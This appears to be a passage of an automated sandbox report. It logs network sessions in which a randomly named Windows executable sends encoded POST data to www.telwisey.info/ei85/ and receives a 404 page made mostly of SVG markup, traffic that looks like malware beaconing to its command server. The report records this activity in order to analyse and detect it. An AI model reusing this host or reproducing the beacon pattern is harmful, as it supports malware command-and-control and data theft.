xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 29, 2024 05:25:39.547066927 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 29, 2024 05:25:39.547077894 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 29, 2024 05:25:39.547091961 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 29, 2024 05:25:39.547103882 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 29, 2024 05:25:39.547338963 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 29, 2024 05:25:39.547380924 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 29, 2024 05:25:39.547391891 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 29, 2024 05:25:39.547528982 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 29, 2024 05:25:39.547591925 CEST	224	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
Aug 29, 2024 05:25:39.552109003 CEST	1236	IN	Data Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	199.192.19.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:41.468811989 CEST	795	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 63 51 65 67 6b 4f 78 6c 43 6b 35 47 45 62 77 57 33 74 63 79 32 51 77 30 33 63 64 55 38 4d 51 42 59 3d Data Ascii: kbRxoVY0=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
Aug 29, 2024 05:25:42.092749119 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:41 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 29, 2024 05:25:42.092770100 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 29, 2024 05:25:42.092782021 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 29, 2024 05:25:42.092792988 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 29, 2024 05:25:42.092816114 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 29, 2024 05:25:42.092828989 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 29, 2024 05:25:42.092840910 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 29, 2024 05:25:42.092919111 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 29, 2024 05:25:42.093192101 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 29, 2024 05:25:42.093250036 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 29, 2024 05:25:42.097583055 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	199.192.19.19	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:25:43.995693922 CEST	10877	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 71 35 72 5a 4d 30 2b 4f 6a 59 2f 32 58 53 63 38 47 4d 76 78 6a 6a 45 4c 6a 50 39 77 6b 32 6f 4a 57 56 4e 53 30 68 44 50 38 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 6b 5a 6d 35 57 52 72 78 72 64 41 6b 68 43 70 64 73 43 71 36 6e 58 4f 32 61 78 65 71 71 78 73 71 59 44 4f 79 78 45 6a 2b 61 37 62 75 51 35 6e 77 4a 31 65 6f 48 73 4c 59 51 62 32 31 30 2f 75 7a 6e 66 57 57 44 33 44 6f 66 51 4c 65 55 2f [TRUNCATED] Data Ascii: kbRxoVY0=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07q5rZM0+OjY/2XSc8GMvxjjELjP9wk2oJWVNS0hDP8g2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GkZm5WRrxrdAkhCpdsCq6nXO2axeqqxsqYDOyxEj+a7buQ5nwJ1eoHsLYQb210/uznfWWD3DofQLeU/c8swQDQLMEHJPu8Oh9b3dVoL2iAc6qieDbFEMFpX/ZJ+HkqLtOHhiekgZsen4K+RIN6Pjr2+R0+dgEMjuyz+lAQY9Hxc95lAZhBLRw9TzSyy76CIvmeGl475JnpFhKg9pV48amtjJySGPr4BSFZxEvzEasOX6z8fdkJRXBgxweOu1pNj/sxb5vIU2uLF9AJJ6QSbjhlfC7ShdnfDp3mhd82PvuZm08IEJPS6EeihzjeGabvPmZgkG++LObAkDusr9oJswpqRKQHxOhHuUEIsOhLd9e7Kq+BUNwHTv72QjB1jCXCwEm787RW/04S0MhJtc6GoYykfsd8dC9FxGjygw5Y7VNDFDacN82rcUch34GOOB+H7nV2GD+vnnyA/cMam9LyY9v9ss/xoYbsxjjB/awRli6yx5y9nJ11vpDWB8dm2WqCczKAV0r/YuHPSlsUTriFl/eREK8rLOxeIHf8Q6jMiWrJruLqaQwT0z7LYoP6E1ntHpn/xS22MtLWVekCaridGquxvyfg1w863y0dD0aIgkSQ8ARKmIGEf3QkJSYv+YiUI6qTYNnsYAd8LAoIwOxiQwYFUb+WQEsX5fEdqfSVnIYMXntGnXY5aIsmQACpuzE8bJoUOBaI84kmkhwsK8806Art9bDLGFlgmJgZiRGxjXRNA0aQtes [TRUNCATED]
Aug 29, 2024 05:25:44.679150105 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:25:44 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 29, 2024 05:25:44.679171085 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 29, 2024 05:25:44.679182053 CEST	448	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 29, 2024 05:25:44.679193974 CEST	1236	IN	Data Raw: 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30 37 22 20 79 32 3d 22 32 36 36 2e 35 38 31 22 Data Ascii: erlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="508.129" y1="255
Aug 29, 2024 05:25:44.679207087 CEST	1236	IN	Data Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 30 30 2e 36 37 22 20 79 31 3d 22 Data Ascii: stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Aug 29, 2024 05:25:44.679219007 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <line fill="none"
Aug 29, 2024 05:25:44.679229975 CEST	1236	IN	Data Raw: 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 Data Ascii: 1.146" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="480.296" y1="406.967" x2="480.296" y2="415.326" />
